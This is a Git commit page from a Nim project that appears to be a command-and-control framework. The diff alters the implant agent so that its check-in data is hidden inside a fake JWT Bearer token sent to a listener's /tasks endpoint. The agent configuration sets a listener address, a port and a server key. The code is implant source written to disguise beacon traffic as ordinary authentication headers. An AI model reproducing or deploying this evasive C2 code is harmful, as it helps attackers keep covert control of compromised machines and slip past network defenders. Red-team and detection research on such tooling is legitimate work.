admin/conquest
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Updated C2 communication to hide heartbeat data in JWT token.

Browse Source
This commit is contained in:
Jakob Friedl
2025-08-13 13:38:39 +02:00
parent 0e205d34d3
commit b7622dd72f
6 changed files with 27 additions and 27 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
src/agent/core/http.nim
View File

@@ -1,4 +1,4 @@
import httpclient, json, strformat, asyncdispatch
import httpclient, json, strformat, strutils, asyncdispatch, base64
import ../../common/[types, utils]
@@ -35,16 +35,15 @@ proc getTasks*(config: AgentConfig, checkinData: seq[byte]): string =
var responseBody = ""
# Define HTTP headers
# The heartbeat data is placed within a JWT token as the payload (Base64URL-encoded)
let payload = encode(checkinData, safe = true).replace("=", "")
client.headers = newHttpHeaders({
"Content-Type": "application/octet-stream",
"Content-Length": $checkinData.len
"Authorization": fmt"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.{payload}.KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30"
})
let body = checkinData.toString()
try:
# Retrieve binary task data from listener and convert it to seq[bytes] for deserialization
responseBody = waitFor client.postContent(fmt"http://{config.ip}:{$config.port}/tasks", body)
responseBody = waitFor client.getContent(fmt"http://{config.ip}:{$config.port}/tasks")
return responseBody
except CatchableError as err:

2
src/agent/main.nim
View File

@@ -25,7 +25,7 @@ proc main() =
# The agent configuration is read at compile time using define/-d statements in nim.cfg
# This configuration file can be dynamically generated from the teamserver management interface
# Downside to this is obviously that readable strings, such as the listener UUID can be found in the binary
when not defined(ListenerUuid) or not defined(Octet1) or not defined(Octet2) or not defined(Octet3) or not defined(Octet4) or not defined(ListenerPort) or not defined(SleepDelay):
when not defined(ListenerUuid) or not defined(Octet1) or not defined(Octet2) or not defined(Octet3) or not defined(Octet4) or not defined(ListenerPort) or not defined(SleepDelay) or not defined(ServerPublicKey):
echo "Missing agent configuration."
quit(0)

12
src/agent/nim.cfg
View File

@@ -1,9 +1,9 @@
# Agent configuration
-d:ListenerUuid="D3AC0FF3"
-d:Octet1="127"
-d:Octet2="0"
-d:Octet3="0"
-d:Octet4="1"
-d:ListenerPort=9999
-d:ListenerUuid="D0981BF3"
-d:Octet1="172"
-d:Octet2="29"
-d:Octet3="177"
-d:Octet4="43"
-d:ListenerPort=6666
-d:SleepDelay=10
-d:ServerPublicKey="mi9o0kPu1ZSbuYfnG5FmDUMAvEXEvp11OW9CQLCyL1U="